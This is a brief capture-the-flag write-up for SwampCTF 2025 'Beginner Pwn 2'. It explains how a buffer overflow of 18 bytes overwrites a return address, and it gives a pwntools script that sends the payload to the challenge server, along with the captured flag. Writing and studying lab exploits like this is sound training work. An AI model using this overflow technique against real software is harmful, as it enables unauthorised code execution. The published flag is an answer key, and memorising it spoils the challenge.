SwampCTF 2025: Beginner Pwn 2

author: @yoshixi solved with: @bentley

Challenge Info:

Category: Pwn

Download

Solution

We take a look at checksec

This is good. We have no PIE and no canary. Straightforwards

Now, we try to find the return address

Turns out the buffer size is 18, so anything afterwards is now the return statement.

We get the correct script as:

import pwn

r = pwn.remote("chals.swampctf.com", 40001)
win_addr = 0x401186

payload = b"A" * 18
payload += pwn.p64(win_addr)
r.sendline(payload)
print(r.recvall().decode('latin-1'))  # Print flag
r.close()

Flag is: swampCTF{1t5_t1m3_t0_r3turn!!}